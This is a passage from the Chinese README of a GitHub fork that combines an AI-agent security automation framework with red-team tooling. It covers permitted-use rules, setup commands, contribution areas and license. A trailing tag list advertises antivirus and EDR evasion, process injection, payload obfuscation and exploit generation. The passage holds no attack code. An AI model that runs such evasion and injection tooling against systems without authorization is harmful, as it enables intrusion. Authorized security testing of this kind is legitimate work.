需有适当的书面授权 - ✅ **漏洞赏金计划** - 在计划范围和规则内 - ✅ **CTF 竞赛** - 教育和竞赛环境 - ✅ **安全研究** - 在自有或授权的系统上 - ✅ **红队演练** - 需经组织批准 - ❌ **未经授权的测试** - 切勿在未经许可的情况下测试系统 - ❌ **恶意活动** - 禁止任何非法或有害活动 - ❌ **数据窃取** - 禁止未经授权的数据访问或窃取 ## 贡献指南 我们欢迎网络安全和 AI 社区的贡献! ### 开发环境设置 ``` # 1. Fork 并克隆仓库 git clone https://github.com/Yenn503/Hexstrike-redteam.git hexstrike-ai cd hexstrike-ai # 2. 创建开发环境 python3 -m venv hexstrike-dev source hexstrike-dev/bin/activate # 3. 安装开发依赖 pip install -r requirements.txt # 4. 启动开发服务器 python3 hexstrike_server.py --port 8888 --debug ``` ### 优先贡献领域 - **🤖 AI 智能体集成** - 支持新的 AI 平台和智能体 - **🛠️ 安全工具添加** - 集成更多安全工具 - **⚡ 性能优化** - 缓存改进和可扩展性增强 - **📖 文档** - AI 使用示例和集成指南 - **🧪 测试框架** - AI 智能体交互的自动化测试 ## 许可证 MIT 许可证 - 详情请参阅 LICENSE 文件。
## 🔗 HexStrike 原始仓库 这是一个集成了 BOAZ 红队功能的分支。如需访问官方 HexStrike AI 项目,请访问: **[HexStrike AI 官方仓库](https://github.com/0x4m4/hexstrike-ai)** **由网络安全社区用 ❤️ 打造,致力于 AI 驱动的安全自动化** *HexStrike AI v6.0 集成 BOAZ 红队功能 - 人工智能与网络安全的完美结合*
标签:AD攻击面, API脱钩, CVE情报, DAST, DNS 反向解析, DNS 解析, EDR绕过, Gophish, Hpfeeds, LLVM混淆, MCP框架, MSFVenom, Python, SSH蜜罐, XML 请求, 二进制分析, 云安全运维, 人工智能, 免杀技术, 内存保护, 反分析, 子域名变形, 安全工具集, 安全开发, 恶意软件分析, 攻击模拟, 无后门, 暴力破解检测, 杀软规避, 漏洞利用生成, 熵分析, 用户模式Hook绕过, 系统调用, 结构化查询, 网络安全, 自动化安全, 载荷混淆, 进程注入, 逆向工具, 隐私保护, 隐蔽信道, 驱动签名利用, 高交互蜜罐